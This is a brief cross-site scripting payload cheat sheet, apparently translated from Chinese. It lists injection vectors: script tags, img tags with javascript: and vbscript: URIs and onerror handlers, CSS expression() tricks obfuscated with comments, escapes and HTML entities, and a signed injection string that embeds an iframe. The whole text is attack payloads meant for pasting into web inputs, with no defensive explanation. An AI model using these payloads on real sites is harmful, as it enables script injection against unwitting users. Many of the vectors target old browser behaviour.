<script>alert("跨站")</script> (most commonly used)
<img src=javascript:alert("跨站")></img>
<img src="javascript: alert(/跨站/)></img>
<img src="javas????cript:alert(/跨站/)" width=150></img> (whitespace produced with the Tab key)
<img src="#" onerror=alert(/跨站/)></img>
<img src="#" style="xss:expression(alert(/xss/));"></img>
<img src="#"/* */onerror=alert(/xss/) width=150></img> (/**/ denotes a comment)
<img src=vbscript:msgbox ("xss")></img>
<style> input {left:expression (alert('xss'))}</style>
<div style={left:expression (alert('xss'))}></div>
<div style={left:exp/* */ression (alert('xss'))}></div>
<div style={left:\0065\0078ression (alert('xss'))}></div>
HTML entity <div style={left:&#x0065;xpression (alert('xss'))}></div>
unicode <div style="{left:expRessioN (alert('xss'))}">
"]}%3Cscript%3Ealert('By b14ckb0y')%3C/script%3E{[&item="]<iframe%20src=http://new.qzone.qq.com/9530772%20width=400%20height=600></iframe>["